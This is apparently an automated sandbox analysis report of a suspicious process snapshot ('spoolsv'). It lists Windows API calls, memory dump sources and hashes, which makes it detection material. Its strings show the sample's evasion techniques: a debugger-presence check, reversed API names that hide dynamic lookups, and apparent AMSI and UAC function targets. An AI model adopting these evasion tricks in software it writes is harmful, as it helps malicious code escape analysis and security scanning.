                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                              • API String ID: 3677997916-4173385793
                                                                              • Opcode ID: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                              • Instruction ID: f060609930730e8b638e9741eb05c7260813a215267a686851b9cb279585f51c
                                                                              • Opcode Fuzzy Hash: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                              • Instruction Fuzzy Hash: 7201D879954328BAF711DB90CD42BBD77FCEB08710F1005E1BA0CD7680E678AA14DB59
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38150,?,?,00000000,00000000,?,02B38069,00000000,KernelBASE,00000000,00000000,02B38090), ref: 02B38115
                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B3811B
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 02B3812D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                              • API String ID: 667068680-1372893251
                                                                              • Opcode ID: bf131f930ea677c29918707b05887c30f511c337a2d23e3fecfe536b4cb7add5
                                                                              • Instruction ID: 218e757731d52521c7229a1be98e16748d1d8501fd0f26f3e7b871451cc3e6d1
                                                                              • Opcode Fuzzy Hash: bf131f930ea677c29918707b05887c30f511c337a2d23e3fecfe536b4cb7add5
                                                                              • Instruction Fuzzy Hash: 63016D79A50304BFEB01EFA8DC41E9E77BEEB4C710F5188E4B508E7A10DA70A915CE25
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(?,00000000,02B2AA6F,?,?,00000000), ref: 02B2A9F0
                                                                                • Part of subcall function 02B2A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A76A
                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AA6F,?,?,00000000), ref: 02B2AA20
                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B2AA2B
                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AA6F,?,?,00000000), ref: 02B2AA49
                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B2AA54
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                              • String ID:
                                                                              • API String ID: 4102113445-0
                                                                              • Opcode ID: dcb2dcd419bc87dcca85deafc239ae01a8eee235ef556e3995ffb4eacaa8da91
                                                                              • Instruction ID: f3834634a280166f8aa88b01b3b561b4024db7c5e6ee43baababae2510670d02
                                                                              • Opcode Fuzzy Hash: dcb2dcd419bc87dcca85deafc239ae01a8eee235ef556e3995ffb4eacaa8da91
                                                                              • Instruction Fuzzy Hash: 8A01F7316003786FF702F6748D12B9E735DDF47B20F5105E0F62DA66D4D6289E0C8AA4
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(?,00000000,02B2AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AAB7
                                                                                • Part of subcall function 02B2A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID: eeee$ggg$yyyy
                                                                              • API String ID: 4232894706-1253427255
                                                                              • Opcode ID: cb6e26d75aff4d6083ac27b390f6f01aa6deaa94d882d376a6204c5ba9c09be9
                                                                              • Instruction ID: b2fb36c493298af64ad8127b9d62fb44fa263c3a8731c585249b71653d74f2b5
                                                                              • Opcode Fuzzy Hash: cb6e26d75aff4d6083ac27b390f6f01aa6deaa94d882d376a6204c5ba9c09be9
                                                                              • Instruction Fuzzy Hash: 884101717043354BC712AB688C942BEB3FBDB85200B1459E6E47ED7754DA38ED0ECA21
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38090,?,?,00000000,?,02B37A06,ntdll,00000000,00000000,02B37A4B,?,?,00000000), ref: 02B3805E
                                                                                • Part of subcall function 02B380C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38150,?,?,00000000,00000000,?,02B38069,00000000,KernelBASE,00000000,00000000,02B38090), ref: 02B38115
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B3811B
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(?,?), ref: 02B3812D
                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02B38072
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressProc
                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                              • API String ID: 1883125708-1952140341
                                                                              • Opcode ID: 7a3af72cd2afb81b8283300aacb43afe949e31ef7981d7fc34aff21776668785
                                                                              • Instruction ID: 34f0a74b67e3e293085dbdeaa66543a44617184e7cdd1e280bb07e06b37b1de0
                                                                              • Opcode Fuzzy Hash: 7a3af72cd2afb81b8283300aacb43afe949e31ef7981d7fc34aff21776668785
                                                                              • Instruction Fuzzy Hash: 80F09071650304BFEB02EFB8DC4195E77BEEB49B40B9149E0F508D3A20DA30AD14DA66
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF98,UacInitialize,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanBuffer,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8,Initialize), ref: 02B3EB9A
                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                              • API String ID: 1646373207-2367923768
                                                                              • Opcode ID: d85ca7504f6aac252242e8027f2d5bc959263f57c90c705bbae2fed167317b85
                                                                              • Instruction ID: 66e3cfeb1721c5ecdfd32ae00901e07b39d1d299dec6f5614835a451a9081605
                                                                              • Opcode Fuzzy Hash: d85ca7504f6aac252242e8027f2d5bc959263f57c90c705bbae2fed167317b85
                                                                              • Instruction Fuzzy Hash: A0D012717557601DB5033AF40CC4C9E23CD8F055297200EF2B027D10E2F666C8195511
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4C10B,00000000,02B4C11E), ref: 02B2C402
                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C413
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: d78dfe55109e5ee6a7026e2c3f8898d98dbcf7d7754776f38b7dddca1ef80af2
                                                                              • Instruction ID: 740e3682fe1346c39dfa4f8e5175653f30bec462c1cd327f78ed9781a32515db
                                                                              • Opcode Fuzzy Hash: d78dfe55109e5ee6a7026e2c3f8898d98dbcf7d7754776f38b7dddca1ef80af2
                                                                              • Instruction Fuzzy Hash: 91D05EB8A413324EE3115AB168C063B3BC8A714744F9568E6A01D47101C7B1541C4F86
                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E21F
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E23B
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E2B2
                                                                              • VariantClear.OLEAUT32(?), ref: 02B2E2DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                              • String ID:
                                                                              • API String ID: 920484758-0
                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                              • Instruction ID: a9c524b25edf70153e6217441a770812c6b7468717c797f62d67fdb192fd17e1
                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                              • Instruction Fuzzy Hash: 7B41F875A007299BCB61DB59CC90BD9B3BDEB4C205F0042E5E64DA7251DA34EF888F60
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACE1
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD05
                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD20
                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADB6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                              • String ID:
                                                                              • API String ID: 3990497365-0
                                                                              • Opcode ID: 6dc0c0e5f0f3c06ea908710f8f7bc28e85b027a4ea681f5289db551793230406
                                                                              • Instruction ID: 4e65494875e869666e87630d5aa6cb91de68c41b53aac7ad83c0a64dcb4f0523
                                                                              • Opcode Fuzzy Hash: 6dc0c0e5f0f3c06ea908710f8f7bc28e85b027a4ea681f5289db551793230406
                                                                              • Instruction Fuzzy Hash: 2F412B71A003689BDB61EB68CC84BDAB7FDAB18340F0044E5A64CE7251DB749F88CF50
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACE1
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD05
                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD20
                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADB6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                              • String ID:
                                                                              • API String ID: 3990497365-0
                                                                              • Opcode ID: a9b3d7dd9b9750a74c0ca94194c9f31952b7e91fbcd3e6d43575a63df110d1e0
                                                                              • Instruction ID: 6efd59e0731eef771b5703f508436eab69768be433a7de59e342b665b690df1a
                                                                              • Opcode Fuzzy Hash: a9b3d7dd9b9750a74c0ca94194c9f31952b7e91fbcd3e6d43575a63df110d1e0
                                                                              • Instruction Fuzzy Hash: 1F410871A403A89BDB61EB68CC84BDAB7EDAB18341F0444E5A64CE7251DB749F88CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                              • Instruction ID: b4b5eaaae65d75ed8967f4af1fe44883c9f3919e991df1f14feb89b47892d704
                                                                              • Opcode Fuzzy Hash: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                              • Instruction Fuzzy Hash: 3FA1E8767317244BE718EA7C9C803ADB386DBC4265F1842FEE52DCB387DB64C9498650
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B29562), ref: 02B294FA
                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B29562), ref: 02B29500
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: DateFormatLocaleThread
                                                                              • String ID: yyyy
                                                                              • API String ID: 3303714858-3145165042
                                                                              • Opcode ID: 4be8b1c6ac923cfa98da1cc7e9e9d6c2e42d3f5bada0c1500bf95bdd57aef761
                                                                              • Instruction ID: f02842c6a1dff4a98f8f898c1bde4fa9cb59af38e83a7ee73957e50e20103fb0
                                                                              • Opcode Fuzzy Hash: 4be8b1c6ac923cfa98da1cc7e9e9d6c2e42d3f5bada0c1500bf95bdd57aef761
                                                                              • Instruction Fuzzy Hash: E9216871A007389FDB11DFA8C881AEAB3BDEF48710F6100E5E94DE7651D6349E488BA5
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AllocValue
                                                                              • String ID: `R
                                                                              • API String ID: 1189806713-3405809726
                                                                              • Opcode ID: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                              • Instruction ID: 77c502de16b857a573282862e186b95491de997d97a6a4e3b3603ef08c64cf2b
                                                                              • Opcode Fuzzy Hash: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                              • Instruction Fuzzy Hash: 8CC002B4E40322CAEF01BBB99544A093BDDEB04385F049DA5B468C7148EB35D41DDF54
                                                                              APIs
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AD98
                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3ADC8
                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3ADE7
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3ADF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Read$Write
                                                                              • String ID:
                                                                              • API String ID: 3448952669-0
                                                                              • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                              • Instruction ID: 7ae4007002f3838c0aad9adce82d5a6159916b0873d2cb576ed879b95f91bf5e
                                                                              • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                              • Instruction Fuzzy Hash: A021B4B1A403199BDB12DF69CC80BAE77B9EF44312F104191EE9597344EB38E915DAA0